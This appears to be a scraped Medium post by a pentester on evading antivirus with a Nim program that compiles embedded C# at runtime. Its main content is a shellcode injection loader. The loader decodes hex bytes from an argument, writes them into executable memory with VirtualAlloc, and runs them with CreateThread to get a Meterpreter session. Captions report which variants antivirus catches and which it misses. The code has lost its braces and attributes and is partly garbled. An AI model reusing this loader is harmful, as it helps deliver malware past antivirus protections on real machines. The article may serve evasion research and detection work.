Payload & Technique Detection

Picture 1: Code Detected by AV
Picture 2: Code Detected by AV
miNativePayload_TI.nim    import winim/clr
import winim/com
import os

var code = """
using System;
using System.Runtime.InteropServices;

public class Program

public void Main(string args)
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("miNativePayload_TI , Published by Damon Mohammadbagher , Dec 2020");
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine("miNativePayload_TI Local Thread Injection");
string X = args;
string[] XX = X.Split(',');
byte[] result_de_obf_payload = new byte[XX.Length];
for (int i = 0; i < XX.Length; i++)
result_de_obf_payload[i] = Convert.ToByte(XX[i], 16);
UInt32 MEM_COMMIT = 0x1000;

Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine("Bingo Meterpreter session by Dynamic / Integration Codes ;)");

UInt32 funcAddr = VirtualAlloc(0x00000000, (UInt32)result_de_obf_payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(result_de_obf_payload, 0x00000000, (IntPtr)(funcAddr), result_de_obf_payload.Length);

IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;

hThread = CreateThread(0x0000, 0x0000, funcAddr, pinfo, 0x0000, ref threadId);
WaitForSingleObject(hThread, 0xffffffff);
Console.ForegroundColor = ConsoleColor.Gray;

private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
var res = compile(code)
var o ="Program")
Picture 3: C# + Nim Code Detected by AV.
Picture 4: C# Code Detected by AV but …
Picture 5: C# Code + Nim Not Detected by AV.
Picture 6: .NET Managed Code & Unmanaged Code




Security Researcher , Pentester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Unicorn Desserts Hack Free Resources Generator

After one week, I Unbricked & Restored my girlfriend’s Smartphone!

Are you Privacy Aware? Data Privacy Day, and Every Day

Welcome to the digital generation- how the internet works (breakdown)

“It will never happen to me.”

Choosing the ‘Right’ Bug Bounty Program

Great Ideas That'll Boost Your Home Security

{UPDATE} Gods and Glory: War of Thrones Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Damon Mohammadbagher

Damon Mohammadbagher

Security Researcher , Pentester

More from Medium

Kruskal’s Algorithm

TREE-Data Structure & Algorithm

Regression in Statistics

Convolutional Neural Networks